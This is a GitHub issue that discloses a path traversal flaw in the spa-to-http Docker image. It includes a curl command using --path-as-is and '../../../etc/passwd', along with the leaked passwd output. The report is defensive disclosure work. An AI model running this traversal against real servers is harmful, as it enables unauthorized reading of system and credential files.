search

devforth / spa-to-http

Lightweight zero-configuration SPA HTTP server. Serves SPA bundle on HTTP port so it plays well with Traefik out of the box. Compatible with Vue.js, React and Angular
MIT License
110 stars 8 forks source link

Path Traversal Vulnerability in devforth/spa-to-http #14

Open sunaley opened 4 months ago

sunaley commented 4 months ago

Description:

I have identified a path traversal vulnerability in the devforth/spa-to-http:latest Docker container. This vulnerability allows an attacker to access sensitive files on the container system.

Steps to Reproduce:

  1. Run the Docker container: 
    sudo docker run --rm -p 8888:8080 -d devforth/spa-to-http:latest
  2. Execute the following curl command:
curl --path-as-is http://127.0.0.1:8888/../../../etc/passwd

You will see the contents of the /etc/passwd file:

    root:x:0:0:root:/root:/bin/ash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/mail:/sbin/nologin
    news:x:9:13:news:/usr/lib/news:/sbin/nologin
    uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    man:x:13:15:man:/usr/man:/sbin/nologin
    postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
    cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
    ftp:x:21:21::/var/lib/ftp:/sbin/nologin
    sshd:x:22:22:sshd:/dev/null:/sbin/nologin
    at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
    squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
    xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
    games:x:35:35:games:/usr/games:/sbin/nologin
    cyrus:x:85:12::/usr/cyrus:/sbin/nologin
    vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
    ntp:x:123:123:NTP:/var/empty:/sbin/nologin
    smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
    guest:x:405:100:guest:/dev/null:/sbin/nologin
    nobody:x:65534:65534:nobody:/:/sbin/nologin

Expected Behavior:

The application should not allow access to files outside of the intended directory.

Actual Behavior:

The application allows traversal outside the intended directory, exposing sensitive files on the host system.

Environment:

Docker version: Docker version 24.0.7, build afdd53b
OS: Rocky Linux release 9.2 (Blue Onyx)

Additional Context:

Please address this vulnerability to prevent unauthorized access to sensitive files.

Thank you for your attention to this matter.